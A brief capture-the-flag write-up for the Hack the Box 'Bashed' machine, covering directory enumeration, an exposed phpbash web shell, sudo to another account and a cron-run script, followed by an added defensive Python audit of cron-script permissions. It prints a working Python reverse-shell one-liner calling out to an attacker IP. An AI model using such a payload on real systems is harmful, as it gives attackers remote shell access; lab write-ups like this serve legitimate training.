Bashed box on Hack the Box Write up
by Jean-Michel Frouin

OS: Linux
Difficulty: Easy
Points: 20
Release: 09 Dec 2017
IP: 10.10.10.68

Enumeration

Ports

80/tcp open tcpwrapped
Apache httpd 2.4.18 (Ubuntu)

Web

dirbuster

jm@kali:~$ dirbuster

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Starting OWASP DirBuster 1.0-RC1

Starting dir/file list based brute forcing
Dir found: / - 200
File found: /index.html - 200
File found: /index.html - 200
File found: /single.html - 200
Dir found: /js/ - 200
File found: /js/jquery.js - 200
File found: /js/imagesloaded.pkgd.js - 200
File found: /js/jquery.nicescroll.min.js - 200
File found: /js/jquery.smartmenus.min.js - 200
File found: /js/jquery.carouFredSel-6.0.0-packed.js - 200
File found: /js/jquery.mousewheel.min.js - 200
File found: /js/jquery.touchSwipe.min.js - 200
Dir found: /demo-images/ - 200
File found: /js/jquery.easing.1.3.js - 200
File found: /js/main.js - 200
File found: /js/custom_google_map_style.js - 200
File found: /js/html5.js - 200
Dir found: /icons/ - 403
File found: /config.php - 200
Dir found: /css/ - 200
Dir found: /images/ - 200
Dir found: /dev/ - 200
File found: /css/carouFredSel.css - 200
File found: /css/clear.css - 200
File found: /css/common.css - 200
File found: /dev/phpbash.min.php - 200
File found: /css/font-awesome.min.css - 200
File found: /css/sm-clean.css - 200
File found: /dev/phpbash.php - 200
Dir found: /php/ - 200
File found: /php/sendMail.php - 200
Dir found: /uploads/ - 200
Dir found: /icons/small/ - 403

/dev/phpbash.php

/php

/php/sendmail.php

/dev/phpbash.min.php

Exploitation

Using phpbash.php

User Flag

/home/arrexel/user.txt

Priv Esc

sudo -l

sudo -u scriptmanager bash

discover /script

test.txt is created by test.py, which cron runs every minute

Reverse Shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.36",5000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'


Root Flag

As always just

cat /root/root.txt
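
The Priv Esc step above depends on a script that cron runs every minute sitting where another account can change it. As an added example (not part of the original write-up), this Python audit checks a cron-run script and each of its parent directories for that condition, assuming the cron job runs with more privilege than the account that can write there; the function names, the trusted-UID set and the constructed temp layout are illustrative assumptions.

```python
import os
import stat
import tempfile

def writable_by_untrusted(path, trusted_uids=frozenset({0})):
    """Return reasons why an account outside trusted_uids could modify path."""
    st = os.stat(path)
    reasons = []
    if st.st_uid not in trusted_uids:
        reasons.append(f"owned by uid {st.st_uid}")
    # A sticky directory (such as /tmp) stops users replacing entries they do
    # not own, so group/other write bits are tolerated there.
    sticky_dir = stat.S_ISDIR(st.st_mode) and bool(st.st_mode & stat.S_ISVTX)
    if not sticky_dir:
        if st.st_mode & stat.S_IWGRP:
            reasons.append("group-writable")
        if st.st_mode & stat.S_IWOTH:
            reasons.append("world-writable")
    return reasons

def audit_cron_script(script, trusted_uids=frozenset({0})):
    """Check the script and each ancestor directory up to the root.
    Write access to any of them lets that account swap in its own code."""
    findings = []
    current = os.path.realpath(script)
    while True:
        findings += [(current, r) for r in writable_by_untrusted(current, trusted_uids)]
        parent = os.path.dirname(current)
        if parent == current:  # reached /
            return findings
        current = parent

def demo():
    """Constructed layout (assumption): scripts/test.py in a 0777 directory."""
    base = os.path.realpath(tempfile.mkdtemp())
    scripts = os.path.join(base, "scripts")
    os.mkdir(scripts)
    script = os.path.join(scripts, "test.py")
    open(script, "w").close()
    os.chmod(script, 0o644)
    os.chmod(scripts, 0o777)
    trusted = frozenset({0, os.getuid()})  # treat the current user as trusted
    found = audit_cron_script(script, trusted)
    return [(os.path.relpath(p, base), r) for p, r in found if p.startswith(scripts)]

if __name__ == "__main__":
    for path, reason in demo():
        print(f"{path}: {reason}")
```

On a real host, call audit_cron_script on every script path referenced by root's crontab and the system cron directories; any finding means the job should be moved to a root-owned, non-writable location.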

